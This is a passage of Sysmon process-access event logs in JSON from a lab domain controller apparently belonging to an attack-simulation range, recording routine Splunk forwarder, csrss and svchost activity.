--no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{E2A3D6B1-1058-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{E2A3D6B1-1103-5F25-0000-001063700500}","ParentProcessId":"4136","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"btool  server list httpServerListener: --no-log","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3434,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-001063700500}\r\nSourceProcessId: 4136\r\nSourceThreadId: 4156\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-001024710500}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-001063700500}","SourceProcessId":"4136","SourceThreadId":"4156","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-001024710500}","TargetProcessId":"4148","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3435,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 660\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1103-5F25-0000-001024710500}\r\nTargetProcessId: 4148\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"660","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1103-5F25-0000-001024710500}","TargetProcessId":"4148","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3436,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3437,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3438,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3439,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3440,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3441,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:47.148","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:47","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3442,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:47.148\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 